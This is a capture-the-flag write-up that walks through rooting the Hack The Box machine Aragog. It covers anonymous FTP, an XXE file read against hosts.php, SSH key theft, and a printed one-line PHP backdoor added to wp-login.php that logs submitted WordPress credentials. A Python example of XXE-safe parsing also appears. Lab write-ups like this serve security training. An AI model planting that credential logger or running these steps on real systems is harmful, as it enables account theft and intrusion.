Aragog is a machine on Hack The Box.
Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.
This article will show how to hack the Aragog box and get root.
Before attacking the Aragog box, we need to collect information. First, we scan for open ports with nmap.
We find that there are 3 open ports:
FTP server running on port 21.
SSH server running on port 22.
HTTP server running on port 80.
Then we enumerate HTTP and see what we can find.
We find a PHP file (hosts.php). That finishes the initial enumeration; now we move on to exploitation.
Hack FTP Server
We know that there is an FTP server. FTP has a few well-known weaknesses to check; first, let's try an anonymous login.
We log in with the username “ftp”, and the login succeeds.
We also find a txt file, which we download with the “get” command.
We “cat” the txt file; the content looks like XML, but we do not yet know what it is used for.
Hack HTTP Server
Then we move to the HTTP server and open the website in the browser.
What do this number and “hosts” mean? Let's google it: “4294967294 hosts”.
We find that it is related to subnet masks. The txt file is also about a subnet mask. So I assume that we can POST that txt file. Now, open Burp and build our payload.
We open Burp, intercept the GET request, and send it to Repeater.
Then we change the method to POST and use the txt file’s content as the request body.
The website responds and calculates the number of possible hosts.
As I mentioned before, the content looks like XML, so I guess that it is an XXE issue. Let's create a payload and read the /etc/passwd file.
Then we just need to change the path to the user.txt file.
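The XXE read above works because hosts.php parses the posted XML and resolves the entities it declares. As an added example that is not the box's code (hosts.php is PHP; the <details>/<subnet_mask> element names and the request layout are assumed), this Python sketch shows the defensive counterpart: a parser that refuses any document carrying a DTD, plus the host-count calculation the page describes.

```python
import ipaddress
import xml.parsers.expat as expat


class RejectedXml(ValueError):
    """Raised when the posted document carries a DOCTYPE or entity declaration."""


def parse_subnet_mask(xml_bytes: bytes) -> str:
    """Return <subnet_mask> text (assumed element name), refusing any DTD.
    XXE needs a DTD to declare an external entity; abort on the first DOCTYPE
    or ENTITY declaration, before the parser can resolve anything.
    """
    parser = expat.ParserCreate()

    def reject(*_args):
        raise RejectedXml("DOCTYPE/entity declarations are not accepted")

    parser.StartDoctypeDeclHandler = reject
    parser.EntityDeclHandler = reject
    # Belt and braces: never process parameter entities either.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    state = {"in_mask": False, "text": []}

    def start(name, _attrs):
        state["in_mask"] = (name == "subnet_mask")
    def end(_name):
        state["in_mask"] = False
    def chars(data):
        if state["in_mask"]:
            state["text"].append(data)

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(xml_bytes, True)
    return "".join(state["text"]).strip()


def possible_hosts(mask: str) -> int:
    """Usable hosts behind a dotted-quad mask: 2^(host bits) - 2, floored at 0."""
    prefix = ipaddress.IPv4Network(f"0.0.0.0/{mask}").prefixlen
    return max(2 ** (32 - prefix) - 2, 0)


# Constructed sample requests (not captured from the box).
BENIGN = b"<details><subnet_mask>0.0.0.0</subnet_mask></details>"
WITH_DTD = b'<!DOCTYPE d [<!ENTITY e "x">]><details><subnet_mask>&e;</subnet_mask></details>'
```

In PHP the equivalent mitigation is to parse the request without the LIBXML_NOENT flag and with the external entity loader disabled.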
Now we move on to root.txt, which requires privilege escalation.
We need a shell for privilege escalation. As our scan showed, SSH is running on this server.
As you may know, SSH supports two ways to log in: with a password or with a key. So the target is the SSH key (because we have no permission to read the shadow file).
We copy the key and use it to log in.
Find WordPress – Aragog
When we go to the web directory (/var/www/html), there is a folder called “dev_wiki”. We visit it in the browser.
Based on the website, we know that the user “Cliff” resets the blog regularly and logs in regularly.
So, if we can capture the WordPress username and password, we may be able to log in as Cliff or as root.
So we edit the wp-login.php file and add the following line to it.
file_put_contents('/var/www/html/login.req', file_get_contents('php://input') . PHP_EOL, FILE_APPEND);
After changing the file, we just need to wait a few minutes, and the “login.req” file appears.
This password is URL-encoded; we decode it with Burp and then use it to log in as root.
This box is not too difficult; I spent 4 hours on it in total. I spent most of the time on the initial step (around 3 hours). I was thinking that it was a code injection issue and tried a lot of payloads, but they did not work. After I found it was XXE, everything was easy. The difficulty should be around 5 (10 is the most difficult).